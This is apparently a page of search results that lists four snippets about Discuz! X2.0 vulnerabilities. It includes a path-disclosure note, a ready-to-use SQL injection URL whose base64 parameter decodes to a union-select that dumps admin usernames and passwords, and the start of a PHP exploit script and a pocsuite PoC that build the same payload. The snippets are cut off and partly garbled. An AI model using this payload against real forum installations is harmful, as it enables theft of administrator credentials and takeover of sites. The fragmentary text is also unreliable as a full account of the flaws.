4 matches found
Discuz x2 source/function/function_connect.php 泄漏服务器物理路径
source/function/functionconnect.php 文件头部没有加: if!defined‘INDISCUZ’ exit‘Access Denied’; 并且在头部包函了其他文件: requireonce libfile‘function/cloud’; Discuz x2 厂商补丁: Discuz! ------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.discuz.net/ !/usr/bin/env python -- coding: utf-8 -- from pocsuite.n...
Discuz! X2.0 SQL注入漏洞 EXP
简要描述: 详细说明: DZ2.0直接暴管理账号密码(默认前缀的情况下) http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd 29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl rZSAnYWRtaW58eHx5%3D base64解码 1′ and 1=2 unio...
Discuz! X2. 0 0day EXP-vulnerability warning-the black bar safety net
? php echo "Discuz! X2. 0 0day EXP\n"; echo "By:Steeltiger \n"; echo "php.exe dz2exp.php http://www.xxx.com/ admin\n"; if! empty$argv1 &&! empty$argv2 echo "Start\n"; $exp = base64encode"1' and 1=2 union all select 1,groupconcatusername,0x7C3274747C,password from precommonmember where username li...
Discuz! X2.0 forum_attachment.php SQL注入漏洞
No description provided by source. Discuz! X2.0 直接暴管理账号密码(默认前缀的情况下)...